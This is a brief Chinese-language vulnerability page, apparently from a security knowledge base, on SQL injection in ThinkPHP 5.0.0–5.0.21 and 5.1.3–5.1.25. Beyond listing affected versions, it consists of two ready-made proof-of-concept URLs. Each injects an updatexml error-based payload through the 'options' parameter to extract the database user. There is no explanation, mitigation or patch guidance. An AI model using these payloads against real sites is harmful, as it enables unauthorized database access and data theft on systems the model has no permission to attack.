跳转至

Thinkphp 5.0.(0-21)&5.1.(3-25)sql注入漏洞

漏洞影响

5.0.0 <= ThinkPHP <= 5.0.21 5.1.3 <= ThinkPHP <= 5.1.25

漏洞POC

5.0.0~5.0.21 、 5.1.3~5.1.10

http://********/index/index/index?options=id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 **

5.1.11~5.1.25

http://********/index/index/index?options=id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23